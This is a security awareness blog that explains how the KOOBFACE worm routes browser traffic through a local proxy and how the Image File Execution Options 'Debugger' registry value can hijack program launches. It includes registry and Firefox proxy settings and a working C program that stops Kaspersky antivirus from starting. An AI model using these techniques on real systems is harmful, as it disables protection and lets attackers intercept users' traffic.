Hacking, Reverse Code Engineering & IT Security Awareness Blog

RSS

I’ve recently read a research paper from Trend-Micro on KOOBFACE worm and I wanted to share with you the interesting way how they redirect popular web browser traffic through the local proxy they install. The Trend-Micro article can be found here: How KOOBFACE Makes Money

Internet Explorer

What you need to modify is this registry entry:

[HKCU/HKLM\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy"=dword:00000001
"ProxyEnable"=dword:00000001
"ProxyHttp1.1"=dword:00000000
"ProxyServer"="http://ProxyServername:ProxyPort"
"ProxyOverride"="<local>"

Reference: http://support.microsoft.com/kb/819961

Firefox

Modify the prefs.js file that you can find under Firefox profile directory in Application Data directory for current user and add:

user_pref("network.proxy.http", "ProxyServer");
user_pref("network.proxy.http_port",ProxyPort);
user_pref("network.proxy.type", 1);

Seems it’s really simple for malware to install a stealth local proxy and by making simple modifications to browser settings they can filter out all the traffic that we send or receive in our web browsers.

Today I came across a pretty interesting information on a registry key that you can use to specify initialization settings for given executable names. In other words it is possible to set up one application to run another one, for example some kind of a debugging application may be used to be launched before the actual application a computer user would execute with a target executable path as a command line argument. The registry key looks like this:

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\exefile.exe]
"Debugger"="launchwiththis.exe"

Try to set up the new entry with notepad.exe as the key name and C:\WINDOWS\system32\calc.exe as the ”Debugger” value.

This entry will launch the calculator EVERY time notepad is supposed to run. The best thing is that this will apply also anytime the user directly clicks any *.txt file.

This little trick is making it extremely easy for malware authors to disable or take control over anti-virus software. I already checked if it works with Kaspersky Internet Security 2009 and it did. I made the system launch the calculator instead of avp.exe and restarted the machine. After I logged in, the calculator process was waiting for input and there was no sign of KIS2009. Of course malware may use explorer.exe instead of calc.exe to conceal it’s actions or even implement their own executable that would inject their malware dll into the AV process when it’s launched. Most frightening thing is that the Kaspersky’s Active Protection, which monitors modifications of autostart registry data, is totally blind to the modification of the registry values I presented here. Therefore it’s possible to write a trojan that would be able to operate from inside of the AV process.

I know this registry key must’ve been discussed many times over last few years, but it seems it’s still posing a threat to computer security, so it’s worth mentioning.

Here is a very short code snippet of an application that would be modifying these registry values to run calc.exe instead of avp.exe.

#include <stdio.h>
#include <windows.h>

int main( int argc, char* argv[] )
{
	HKEY key;
	if ( RegCreateKey( HKEY_LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\avp.exe", &key ) == ERROR_SUCCESS )
	{
		char *dataval = "C:\\WINDOWS\\system32\\calc.exe";
		if ( RegSetValue( key, "Debugger", REG_SZ, dataval, strlen(dataval) ) == ERROR_SUCCESS )
		{
			printf( "OK!\n" );
			return 1;
		}
	}
	printf( "FAILED!\n" );
	return 0;
}